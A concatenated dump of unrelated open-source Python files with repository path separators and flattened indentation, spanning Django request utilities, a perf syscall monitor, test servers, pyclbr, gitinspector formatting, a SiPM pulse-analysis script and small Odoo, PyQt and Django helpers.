memo[id(self)] = result
for key, value in six.iterlists(self):
result.setlist(copy.deepcopy(key, memo), copy.deepcopy(value, memo))
return result
def setlist(self, key, list_):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
list_ = [bytes_to_text(elt, self.encoding) for elt in list_]
super(QueryDict, self).setlist(key, list_)
def setlistdefault(self, key, default_list=None):
self._assert_mutable()
return super(QueryDict, self).setlistdefault(key, default_list)
def appendlist(self, key, value):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
value = bytes_to_text(value, self.encoding)
super(QueryDict, self).appendlist(key, value)
def pop(self, key, *args):
self._assert_mutable()
return super(QueryDict, self).pop(key, *args)
def popitem(self):
self._assert_mutable()
return super(QueryDict, self).popitem()
def clear(self):
self._assert_mutable()
super(QueryDict, self).clear()
def setdefault(self, key, default=None):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
default = bytes_to_text(default, self.encoding)
return super(QueryDict, self).setdefault(key, default)
def copy(self):
"""Returns a mutable copy of this object."""
return self.__deepcopy__({})
def urlencode(self, safe=None):
"""
Returns an encoded string of all query string arguments.
:arg safe: Used to specify characters which do not require quoting, for
example::
>>> q = QueryDict(mutable=True)
>>> q['next'] = '/a&b/'
>>> q.urlencode()
'next=%2Fa%26b%2F'
>>> q.urlencode(safe='/')
'next=/a%26b/'
"""
output = []
if safe:
safe = force_bytes(safe, self.encoding)
def encode(k, v):
return '%s=%s' % ((quote(k, safe), quote(v, safe)))
else:
def encode(k, v):
return urlencode({k: v})
for k, list_ in self.lists():
k = force_bytes(k, self.encoding)
output.extend(encode(k, force_bytes(v, self.encoding))
for v in list_)
return '&'.join(output)
# It's neither necessary nor appropriate to use
# django.utils.encoding.smart_text for parsing URLs and form inputs. Thus,
# this slightly more restricted function, used by QueryDict.
def bytes_to_text(s, encoding):
"""
Converts basestring objects to unicode, using the given encoding. Illegally
encoded input characters are replaced with Unicode "unknown" codepoint
(\ufffd).
Returns any non-basestring objects without change.
"""
if isinstance(s, bytes):
return six.text_type(s, encoding, 'replace')
else:
return s
def split_domain_port(host):
"""
Return a (domain, port) tuple from a given host.
Returned domain is lower-cased. If the host is invalid, the domain will be
empty.
"""
host = host.lower()
if not host_validation_re.match(host):
return '', ''
if host[-1] == ']':
# It's an IPv6 address without a port.
return host, ''
bits = host.rsplit(':', 1)
if len(bits) == 2:
return tuple(bits)
return bits[0], ''
def validate_host(host, allowed_hosts):
"""
Validate the given host for this site.
Check that the host looks valid and matches a host or host pattern in the
given list of ``allowed_hosts``. Any pattern beginning with a period
matches a domain and all its subdomains (e.g. ``.example.com`` matches
``example.com`` and any subdomain), ``*`` matches anything, and anything
else must match exactly.
Note: This function assumes that the given host is lower-cased and has
already had the port, if any, stripped off.
Return ``True`` for a valid host, ``False`` otherwise.
"""
host = host[:-1] if host.endswith('.') else host
for pattern in allowed_hosts:
if pattern == '*' or is_same_domain(host, pattern):
return True
return False
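# Illustrative examples of the matching rules above (hosts already lower-cased
# and stripped of any port):
#     validate_host('example.com', ['.example.com'])      -> True
#     validate_host('sub.example.com', ['.example.com'])  -> True
#     validate_host('example.org', ['.example.com'])      -> False
#     validate_host('anything.invalid', ['*'])            -> True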
|
Yukarumya/Yukarum-Redfoxes
|
refs/heads/master
|
testing/web-platform/tests/tools/serve/__init__.py
|
458
|
import serve
|
DevriesL/HeroQLTE_ImageBreaker
|
refs/heads/master
|
tools/perf/scripts/python/sctop.py
|
1996
|
# system call top
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
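# Example invocations (illustrative):
#   perf script -s sctop.py            # all comms, default 3 second refresh
#   perf script -s sctop.py 5          # all comms, 5 second refresh
#   perf script -s sctop.py sshd 5     # only syscalls made by 'sshd'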
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n";
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
raw_syscalls__sys_enter(**locals())
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
dlazz/ansible
|
refs/heads/devel
|
test/integration/targets/wait_for/files/testserver.py
|
222
|
import sys
if __name__ == '__main__':
if sys.version_info[0] >= 3:
import http.server
import socketserver
PORT = int(sys.argv[1])
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
httpd.serve_forever()
else:
import mimetypes
mimetypes.init()
mimetypes.add_type('application/json', '.json')
import SimpleHTTPServer
SimpleHTTPServer.test()
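# Illustrative usage (the port is an arbitrary example value):
#     python testserver.py 8080
# serves the current working directory over HTTP on port 8080 until killed.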
|
Fkawala/gcloud-python
|
refs/heads/master
|
bigquery/google/__init__.py
|
194
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import pkg_resources
pkg_resources.declare_namespace(__name__)
except ImportError:
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
|
fighterCui/L4ReFiascoOC
|
refs/heads/master
|
l4/pkg/python/contrib/Lib/pyclbr.py
|
182
|
"""Parse a Python module and describe its classes and methods.
Parse enough of a Python file to recognize imports and class and
method definitions, and to find out the superclasses of a class.
The interface consists of a single function:
readmodule_ex(module [, path])
where module is the name of a Python module, and path is an optional
list of directories where the module is to be searched. If present,
path is prepended to the system search path sys.path. The return
value is a dictionary. The keys of the dictionary are the names of
the classes defined in the module (including classes that are defined
via the from XXX import YYY construct). The values are class
instances of the class Class defined here. One special key/value pair
is present for packages: the key '__path__' has a list as its value
which contains the package search path.
A class is described by the class Class in this module. Instances
of this class have the following instance variables:
module -- the module name
name -- the name of the class
super -- a list of super classes (Class instances)
methods -- a dictionary of methods
file -- the file in which the class was defined
lineno -- the line in the file on which the class statement occurred
The dictionary of methods uses the method names as keys and the line
numbers on which the method was defined as values.
If the name of a super class is not recognized, the corresponding
entry in the list of super classes is not a class instance but a
string giving the name of the super class. Since import statements
are recognized and imported modules are scanned as well, this
shouldn't happen often.
A function is described by the class Function in this module.
Instances of this class have the following instance variables:
module -- the module name
name -- the name of the class
file -- the file in which the class was defined
lineno -- the line in the file on which the class statement occurred
"""
import sys
import imp
import tokenize
from token import NAME, DEDENT, OP
from operator import itemgetter
__all__ = ["readmodule", "readmodule_ex", "Class", "Function"]
_modules = {} # cache of modules we've seen
# each Python class is represented by an instance of this class
class Class:
'''Class to represent a Python class.'''
def __init__(self, module, name, super, file, lineno):
self.module = module
self.name = name
if super is None:
super = []
self.super = super
self.methods = {}
self.file = file
self.lineno = lineno
def _addmethod(self, name, lineno):
self.methods[name] = lineno
class Function:
'''Class to represent a top-level Python function'''
def __init__(self, module, name, file, lineno):
self.module = module
self.name = name
self.file = file
self.lineno = lineno
def readmodule(module, path=None):
'''Backwards compatible interface.
Call readmodule_ex() and then only keep Class objects from the
resulting dictionary.'''
res = {}
for key, value in _readmodule(module, path or []).items():
if isinstance(value, Class):
res[key] = value
return res
def readmodule_ex(module, path=None):
'''Read a module file and return a dictionary of classes.
Search for MODULE in PATH and sys.path, read and parse the
module and return a dictionary with one entry for each class
found in the module.
'''
return _readmodule(module, path or [])
def _readmodule(module, path, inpackage=None):
'''Do the hard work for readmodule[_ex].
If INPACKAGE is given, it must be the dotted name of the package in
which we are searching for a submodule, and then PATH must be the
package search path; otherwise, we are searching for a top-level
module, and PATH is combined with sys.path.
'''
# Compute the full module name (prepending inpackage if set)
if inpackage is not None:
fullmodule = "%s.%s" % (inpackage, module)
else:
fullmodule = module
# Check in the cache
if fullmodule in _modules:
return _modules[fullmodule]
# Initialize the dict for this module's contents
dict = {}
# Check if it is a built-in module; we don't do much for these
if module in sys.builtin_module_names and inpackage is None:
_modules[module] = dict
return dict
# Check for a dotted module name
i = module.rfind('.')
if i >= 0:
package = module[:i]
submodule = module[i+1:]
parent = _readmodule(package, path, inpackage)
if inpackage is not None:
package = "%s.%s" % (inpackage, package)
return _readmodule(submodule, parent['__path__'], package)
# Search the path for the module
f = None
if inpackage is not None:
f, fname, (_s, _m, ty) = imp.find_module(module, path)
else:
f, fname, (_s, _m, ty) = imp.find_module(module, path + sys.path)
if ty == imp.PKG_DIRECTORY:
dict['__path__'] = [fname]
path = [fname] + path
f, fname, (_s, _m, ty) = imp.find_module('__init__', [fname])
_modules[fullmodule] = dict
if ty != imp.PY_SOURCE:
# not Python source, can't do anything with this module
f.close()
return dict
stack = [] # stack of (class, indent) pairs
g = tokenize.generate_tokens(f.readline)
try:
for tokentype, token, start, _end, _line in g:
if tokentype == DEDENT:
lineno, thisindent = start
# close nested classes and defs
while stack and stack[-1][1] >= thisindent:
del stack[-1]
elif token == 'def':
lineno, thisindent = start
# close previous nested classes and defs
while stack and stack[-1][1] >= thisindent:
del stack[-1]
tokentype, meth_name, start = g.next()[0:3]
if tokentype != NAME:
continue # Syntax error
if stack:
cur_class = stack[-1][0]
if isinstance(cur_class, Class):
# it's a method
cur_class._addmethod(meth_name, lineno)
# else it's a nested def
else:
# it's a function
dict[meth_name] = Function(fullmodule, meth_name,
fname, lineno)
stack.append((None, thisindent)) # Marker for nested fns
elif token == 'class':
lineno, thisindent = start
# close previous nested classes and defs
while stack and stack[-1][1] >= thisindent:
del stack[-1]
tokentype, class_name, start = g.next()[0:3]
if tokentype != NAME:
continue # Syntax error
# parse what follows the class name
tokentype, token, start = g.next()[0:3]
inherit = None
if token == '(':
names = [] # List of superclasses
# there's a list of superclasses
level = 1
super = [] # Tokens making up current superclass
while True:
tokentype, token, start = g.next()[0:3]
if token in (')', ',') and level == 1:
n = "".join(super)
if n in dict:
# we know this super class
n = dict[n]
else:
c = n.split('.')
if len(c) > 1:
# super class is of the form
# module.class: look in module for
# class
m = c[-2]
c = c[-1]
if m in _modules:
d = _modules[m]
if c in d:
n = d[c]
names.append(n)
super = []
if token == '(':
level += 1
elif token == ')':
level -= 1
if level == 0:
break
elif token == ',' and level == 1:
pass
# only use NAME and OP (== dot) tokens for type name
elif tokentype in (NAME, OP) and level == 1:
super.append(token)
# expressions in the base list are not supported
inherit = names
cur_class = Class(fullmodule, class_name, inherit,
fname, lineno)
if not stack:
dict[class_name] = cur_class
stack.append((cur_class, thisindent))
elif token == 'import' and start[1] == 0:
modules = _getnamelist(g)
for mod, _mod2 in modules:
try:
# Recursively read the imported module
if inpackage is None:
_readmodule(mod, path)
else:
try:
_readmodule(mod, path, inpackage)
except ImportError:
_readmodule(mod, [])
except:
# If we can't find or parse the imported module,
# too bad -- don't die here.
pass
elif token == 'from' and start[1] == 0:
mod, token = _getname(g)
if not mod or token != "import":
continue
names = _getnamelist(g)
try:
# Recursively read the imported module
d = _readmodule(mod, path, inpackage)
except:
# If we can't find or parse the imported module,
# too bad -- don't die here.
continue
# add any classes that were defined in the imported module
# to our name space if they were mentioned in the list
for n, n2 in names:
if n in d:
dict[n2 or n] = d[n]
elif n == '*':
# don't add names that start with _
for n in d:
if n[0] != '_':
dict[n] = d[n]
except StopIteration:
pass
f.close()
return dict
def _getnamelist(g):
# Helper to get a comma-separated list of dotted names plus 'as'
# clauses. Return a list of pairs (name, name2) where name2 is
# the 'as' name, or None if there is no 'as' clause.
names = []
while True:
name, token = _getname(g)
if not name:
break
if token == 'as':
name2, token = _getname(g)
else:
name2 = None
names.append((name, name2))
while token != "," and "\n" not in token:
token = g.next()[1]
if token != ",":
break
return names
def _getname(g):
# Helper to get a dotted name, return a pair (name, token) where
# name is the dotted name, or None if there was no dotted name,
# and token is the next input token.
parts = []
tokentype, token = g.next()[0:2]
if tokentype != NAME and token != '*':
return (None, token)
parts.append(token)
while True:
tokentype, token = g.next()[0:2]
if token != '.':
break
tokentype, token = g.next()[0:2]
if tokentype != NAME:
break
parts.append(token)
return (".".join(parts), token)
def _main():
# Main program for testing.
import os
mod = sys.argv[1]
if os.path.exists(mod):
path = [os.path.dirname(mod)]
mod = os.path.basename(mod)
if mod.lower().endswith(".py"):
mod = mod[:-3]
else:
path = []
dict = readmodule_ex(mod, path)
objs = dict.values()
objs.sort(lambda a, b: cmp(getattr(a, 'lineno', 0),
getattr(b, 'lineno', 0)))
for obj in objs:
if isinstance(obj, Class):
print "class", obj.name, obj.super, obj.lineno
methods = sorted(obj.methods.iteritems(), key=itemgetter(1))
for name, lineno in methods:
if name != "__path__":
print " def", name, lineno
elif isinstance(obj, Function):
print "def", obj.name, obj.lineno
if __name__ == "__main__":
_main()
|
gitisaac/gitinspector
|
refs/heads/master
|
gitinspector/format.py
|
46
|
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import unicode_literals
import localization
import version
import base64
import basedir
import os
import terminal
import textwrap
import time
import zipfile
__available_formats__ = ["html", "htmlembedded", "text", "xml"]
DEFAULT_FORMAT = __available_formats__[2]
__selected_format__ = DEFAULT_FORMAT
class InvalidFormatError(Exception):
def __init__(self, msg):
super(InvalidFormatError, self).__init__(msg)
self.msg = msg
def select(format):
global __selected_format__
__selected_format__ = format
return format in __available_formats__
def get_selected():
return __selected_format__
def is_interactive_format():
return __selected_format__ == "text"
def __output_html_template__(name):
template_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), name)
file_r = open(template_path, "rb")
return file_r.read().decode("utf-8", "replace")
def __get_zip_file_content__(name, file_name="/html/flot.zip"):
zip_file = zipfile.ZipFile(basedir.get_basedir() + file_name, "r")
content = zip_file.read(name)
zip_file.close()
return content.decode("utf-8", "replace")
def output_header():
if __selected_format__ == "html" or __selected_format__ == "htmlembedded":
base = basedir.get_basedir()
html_header = __output_html_template__(base + "/html/html.header")
tablesorter_js = __get_zip_file_content__("jquery.tablesorter.min.js", "/html/jquery.tablesorter.min.js.zip").encode("latin-1", "replace")
tablesorter_js = tablesorter_js.decode("utf-8", "ignore")
flot_js = __get_zip_file_content__("jquery.flot.js")
pie_js = __get_zip_file_content__("jquery.flot.pie.js")
resize_js = __get_zip_file_content__("jquery.flot.resize.js")
logo_file = open(base + "/html/gitinspector_piclet.png", "rb")
logo = logo_file.read()
logo_file.close()
logo = base64.b64encode(logo)
if __selected_format__ == "htmlembedded":
jquery_js = ">" + __get_zip_file_content__("jquery.js")
else:
jquery_js = " src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js\">"
print(html_header.format(title = _("Repository statistics for {0}").format(os.path.basename(basedir.get_basedir_git())),
jquery = jquery_js,
jquery_tablesorter = tablesorter_js,
jquery_flot = flot_js,
jquery_flot_pie = pie_js,
jquery_flot_resize = resize_js,
logo = logo.decode("utf-8", "replace"),
logo_text = _("The output has been generated by {0} {1}. The statistical analysis tool"
" for git repositories.").format(
"<a href=\"https://gitinspector.googlecode.com\">gitinspector</a>",
version.__version__),
repo_text = _("Statistical information for the repository '{0}' was gathered on {1}.").format(
                os.path.basename(basedir.get_basedir_git()), localization.get_date()),
show_minor_authors = _("Show minor authors"),
hide_minor_authors = _("Hide minor authors"),
show_minor_rows = _("Show rows with minor work"),
hide_minor_rows = _("Hide rows with minor work")))
elif __selected_format__ == "xml":
print("<gitinspector>")
print("\t<version>" + version.__version__ + "</version>")
print("\t<repository>" + os.path.basename(basedir. get_basedir_git()) + "</repository>")
print("\t<report-date>" + time.strftime("%Y/%m/%d") + "</report-date>")
else:
print(textwrap.fill(_("Statistical information for the repository '{0}' was gathered on {1}.").format(
os.path.basename(basedir.get_basedir_git()), localization.get_date()), width=terminal.get_size()[0]))
def output_footer():
if __selected_format__ == "html" or __selected_format__ == "htmlembedded":
base = basedir.get_basedir()
html_footer = __output_html_template__(base + "/html/html.footer")
print(html_footer)
elif __selected_format__ == "xml":
print("</gitinspector>")
|
elena/django
|
refs/heads/master
|
tests/apps/explicit_default_config_mismatch_app/apps.py
|
21
|
from django.apps import AppConfig
class ImplicitDefaultConfigMismatch(AppConfig):
name = 'apps.explicit_default_config_mismatch_app'
|
dahlstrom-g/intellij-community
|
refs/heads/master
|
python/testData/resolve/multiFile/pkgResourcesNamespaceWithDocstring/root1/pkg/a.py
|
64
|
import pkg.second
# <ref>
|
MalloyPower/parsing-python
|
refs/heads/master
|
front-end/testsuite-python-lib/Python-2.4.3/Lib/plat-mac/Carbon/AH.py
|
82
|
from _AH import *
|
igemsoftware2017/USTC-Software-2017
|
refs/heads/master
|
tests/core/files/test_views.py
|
1
|
from rest_framework.test import APITestCase
from django.urls import reverse
from django.test import override_settings
from biohub.accounts.models import User
from ._utils import open_sample
@override_settings(DEBUG=True)
class Test(APITestCase):
def test_upload_fail(self):
url = reverse('default:files:upload')
self.assertEqual(403,
self.client.post(url, {}).status_code)
def test_upload(self, filename='2.txt.txt'):
url = reverse('default:files:upload')
me = User.objects.create_test_user('me')
self.client.force_authenticate(me)
sample = open_sample(filename)
content = sample.read()
sample.seek(0)
# Phase 1
resp = self.client.post(url + '?store_db=1', dict(file=sample))
self.assertIn('id', resp.data)
self.assertEqual(resp.data['name'], filename)
self.assertEqual(
content,
b''.join(
self.client.get(resp.data['file']).streaming_content))
# Phase 2
sample.seek(0)
resp = self.client.post(url, dict(file=sample))
self.assertNotIn('id', resp.data)
self.assertEqual(
content,
b''.join(
self.client.get(resp.data['file']).streaming_content))
def test_upload2(self):
self.test_upload('2')
|
gregorv/sipm_analyse
|
refs/heads/master
|
extract_pulse_spectrum.py
|
1
|
# -*- coding: utf-8 -*-
import platform
if platform.python_implementation() == "PyPy":
import numpypy
else:
import matplotlib.pyplot as plt
from scipy.optimize import leastsq
fig = plt.figure()
import numpy as np
#import scipy
import datafile
import sys
import os
import time
import argparse
from pulse import *
filter_kernel = None
def get_events(t, sig):
a = filter(lambda x: (x[1]-x[0]) > 2 or not x[2], flankenize(t, sig))
#for x in collapse_flanks(a):
#print not x[2], sig[x[1]] - sig[x[0]]
b = filter(lambda x: not x[2] and (sig[x[1]] - sig[x[0]]) < -5, collapse_flanks(a))
#plt.plot(t, sig, "x-")
#for start_idx, end_idx, pos in b:
#print [t[start_idx], t[end_idx]], [sig[start_idx], sig[end_idx]]
#plt.plot([t[start_idx], t[end_idx]],
#[sig[start_idx], sig[end_idx]], color="red")
#fig.savefig("test.pdf")
#fig.clf()
return [t[end_idx] for start_idx, end_idx, pos in b]
def process_frame(number, t, sig):
t, smooth_signal = integrate_signal(t, sig)
# Get events
events = get_events(t, smooth_signal)
# Fit exp. curve to get each events amplitude
result = []
t_0 = None
for i, t_ev in enumerate(events):
try:
t_ev_next = events[i+1]
except IndexError:
t_ev_next = None
t_ev_fit, amplitude = fit_decay(t, sig, t_ev, t_ev_next)
#print "x_1", x
if t_ev_fit-200 < 0.0 or t_ev_fit > t[-1]:
continue
if amplitude > 1000.0:
sys.stderr.write("\nSorted out! Frame idx {0}\n".format(number))
return []
if t_0 is None:
t_0 = t_ev_fit
else:
result.append((t_ev_fit-t_0, amplitude))
# prepare return set
return result
def process_frame_quick(number, t, sig):
t_start = 200
t, smooth_signal = integrate_signal(t, sig)
#plt.plot(t, smooth_signal)
#plt.savefig("test.png")
#plt.clf()
# Get events
a = filter(lambda x: (x[1]-x[0]) > 2 or not x[2], flankenize(t, smooth_signal))
b = filter(lambda x: not x[2] and (smooth_signal[x[1]] - smooth_signal[x[0]]) < -5, collapse_flanks(a))
c = filter(lambda x: int(t_start/(t[-1] - t[0])*len(t)) < x[0], b)
events = []
for start_idx, end_idx, _ in c:
end_idx -= 3 # empiric offset
events.append((t[end_idx],
sig[end_idx] - sig[start_idx]))
if len(events) > 1:
return [(t_ev-events[0][0], amplitude)
for t_ev, amplitude
in events[1:]]
else:
return []
def process_frame_full_spectrum(number, t, sig):
t, smooth_signal = integrate_signal(t, sig)
a = filter(lambda x: (x[1]-x[0]) > 2 or
not x[2], flankenize(t, smooth_signal))
b = filter(lambda x: not x[2] and
(smooth_signal[x[1]] - smooth_signal[x[0]]) < -5,
collapse_flanks(a))
return [(t[end_idx],
sig[end_idx] - sig[start_idx])
for start_idx, end_idx, pos in b]
def integrate_signal(time, signal):
    # Despite its name, this is a moving-average smoothing of the signal
    # over a window of roughly 2*half_window_size samples.
    new_sig = []
    half_window_size = 5
for i in xrange(len(signal)):
used_samples = 0
sig = 0
for j in xrange(i-half_window_size, i+half_window_size):
try:
sig += signal[j]
used_samples += 1
except IndexError:
pass
sig /= used_samples
new_sig.append(sig)
return time, new_sig
def time_string(seconds):
s = ""
seconds = int(seconds)
if (seconds / 86400) > 0:
s = ''.join((s, str(seconds / 86400), "d "))
seconds %= 86400
if (seconds / 3600) > 0:
s = ''.join((s, str(seconds / 3600), "h "))
seconds %= 3600
if (seconds / 60) > 0:
s = ''.join((s, str(seconds / 60), "m "))
seconds %= 60
return ''.join((s, str(seconds), "s"))
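# Illustrative examples of the formatting above:
#   time_string(42)    -> "42s"
#   time_string(3725)  -> "1h 2m 5s"
#   time_string(90061) -> "1d 1h 1m 1s"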
if __name__ == "__main__":
parser = argparse.ArgumentParser(sys.argv[0])
parser.add_argument("-d", "--dataset", default=None, metavar="dataset")
parser.add_argument("-o", "--outfile", default='', metavar="outfile")
parser.add_argument("-s", "--silent", default=False, action="store_true")
parser.add_argument("-q", "--quick-and-dirty", default=False, action="store_true")
parser.add_argument("-S", "--full-spectrum", default=False, action="store_true", help="If set, *all* pulses in the frame are placed in output. The default is to write only the pulses after a certain initial pulse that occured in a certain time-range. The -S output is used for countrates, without it, it is usefull for time-structure analysis (after-pulsing etc.)")
parser.add_argument("data", nargs="+", type=str)
args = parser.parse_args()
if args.outfile:
try:
f = open(args.outfile, "r")
f.close()
while 1:
sys.stderr.write("Target file '{0}' already exists. Overwrite and continue? [y/N] ".format(args.outfile))
answer = raw_input()
if answer.lower() == "y":
break
elif answer.lower() in ("n", ""):
sys.exit(0)
except IOError:
# file does not exist
pass
outfile = open(args.outfile, "w")
else:
outfile = sys.stdout
try:
if args.dataset:
dataset = set()
groups = args.dataset.split(",")
for g in groups:
if ":" in g:
low, high = map(int, g.split(":"))
dataset.update(range(low, high+1))
else:
dataset.add(int(g))
else:
dataset = None
num_frames, num_frames_processed = 0, 0
clock_start = 0
clock_end = 0
try:
info = datafile.get_dta_info(args.data[0])
if info:
header = datafile.get_dta_userheader(args.data[0])
out_header = ("# "+"\n# ".join(("{0} = {1}".format(*k)
for k in header.iteritems())
) + "\n"
if len(header) > 0 else "")
out_header += "# full_spectrum_b = {0}\n".format("True" if args.full_spectrum else "False")
outfile.write("\n## Original user header\n{0}##\n\n".format(out_header))
except Exception:
outfile.write("# full_spectrum_b = {0}\n".format("True" if args.full_spectrum else "False"))
raise
if args.quick_and_dirty:
process_function = process_frame_quick
else:
process_function = process_frame
if args.full_spectrum:
process_function = process_frame_full_spectrum
def print_status():
#elapsed_time = (time.clock() if clock_end == 0 else clock_end) - clock_start
elapsed_time = time.clock() - clock_start
if num_frames_processed > 0:
time_remaining = elapsed_time/num_frames_processed * (num_frames - num_frames_processed)
sys.stderr.write("\33[2K\rProcess frame {0} of {1}, {2} elapsed, {3:.1f}ms/frame, about {4} remaining"
.format(num_frames_processed,
num_frames,
time_string(elapsed_time),
elapsed_time/num_frames_processed*1000.0 if num_frames_processed > 0 else 0.0,
time_string(time_remaining) if num_frames_processed > 0 else '?'
)
)
outfile.flush()
if args.data[0].endswith("/"):
dirname = os.path.basename(args.data[0][:-1])
else:
dirname = os.path.basename(args.data[0])
output_name = dirname+".csv"
clock_start = time.clock()
outfile.write("# Source data: "+", ".join(args.data))
outfile.write("\n#Delta T(ns)\tAmplitude(mV)\tFrame Idx\n")
for num_frames, frame_idx, t, signal in datafile.get_all_data(args.data,
dataset):
#if dataset is not None and frame_idx not in dataset:
#continue
try:
if 1 and (num_frames_processed % 50) == 0:
try:
print_status()
sys.stdout.flush()
except ZeroDivisionError:
pass
event_list = process_function(frame_idx, t, signal)
for delta_t, amplitude in event_list:
outfile.write("{0}\t{1}\t{2}\n".format(delta_t, amplitude, frame_idx))
num_frames_processed += 1
except KeyboardInterrupt:
clock_end = time.clock()
if not args.silent:
print_status()
sys.stderr.write("\nKeyboard interrupt, save recent datapoints\n")
break
else:
clock_end = time.clock()
if not args.silent:
print_status()
sys.stderr.write("\nAll frames processed\n")
finally:
outfile.close()
#print "Results will be written to", output_name
#if not 0:
#print "No events? O.o"
#elif len(time_differences) < 2:
#print "Not enough events"
##else:
#fig = plt.figure()
#plt.xlabel(u"Zeitabstand (ns)")
#plt.ylabel(u"Zählrate")
#plt.text("Hallo")
#plt.hist(time_differences, bins=30, log=True)
#plt.savefig("time_difference_histogram.pdf")
#del fig
|
manashmndl/LearningPyQt
|
refs/heads/master
|
ML/ProjectEEESwissKnife/ProjectEEESwissKnife/ProjectEEESwissKnife.py
|
1
|
from PyQt4 import QtCore, QtGui
from ui_plottercreator import *
import sys
class PlotterCreator(QtGui.QDialog):
    def __init__(self, parent=None):
        QtGui.QDialog.__init__(self, parent)
        self.ui = Ui_PlotterCreator()
        self.ui.setupUi(self)
        # Re-parse the line edit whenever its text is edited by the user.
        QtCore.QObject.connect(self.ui.noOfDataLineEdit, QtCore.SIGNAL('textEdited(QString)'), self.parseData)
    def parseData(self, input_string=""):
        """Convert space-separated input such as '1 2 3' into '1:2:3'."""
        self.parsedString = str(input_string)
        self.parsedString = self.parsedString.replace(' ', ':')
        self.ui.noOfDataLineEdit.setText(self.parsedString)
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
PlotterCreatorApp = PlotterCreator()
PlotterCreatorApp.show()
sys.exit(app.exec_())
|
Communities-Communications/cc-odoo
|
refs/heads/master
|
addons/website_report/report.py
|
257
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.addons.web.http import request
from openerp.osv import osv
class Report(osv.Model):
_inherit = 'report'
def translate_doc(self, cr, uid, doc_id, model, lang_field, template, values, context=None):
if request and hasattr(request, 'website'):
if request.website is not None:
v = request.website.get_template(template)
request.session['report_view_ids'].append({
'name': v.name,
'id': v.id,
'xml_id': v.xml_id,
'inherit_id': v.inherit_id.id,
'header': False,
'active': v.active,
})
return super(Report, self).translate_doc(cr, uid, doc_id, model, lang_field, template, values, context=context)
def render(self, cr, uid, ids, template, values=None, context=None):
if request and hasattr(request, 'website'):
if request.website is not None:
request.session['report_view_ids'] = []
return super(Report, self).render(cr, uid, ids, template, values=values, context=context)
|
vermpy/thespotlight
|
refs/heads/master
|
src/interviews/templatetags/order_by.py
|
1
|
from django.template import Library
register = Library()
@register.filter_function
def order_by(queryset, args):
args = [x.strip() for x in args.split(',')]
return queryset.order_by(*args)
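# Illustrative usage (not part of the original file): in a template the filter
# above can be applied to a queryset from the context; the variable and field
# names below are assumptions for illustration only.
#
#   {% load order_by %}
#   {% for interview in interviews|order_by:"-date, title" %}
#       {{ interview.title }}
#   {% endfor %}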
|
SerCeMan/intellij-community
|
refs/heads/master
|
python/helpers/docutils/parsers/rst/languages/pl.py
|
56
|
# $Id$
# Author: Robert Wojciechowicz <rw@smsnet.pl>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
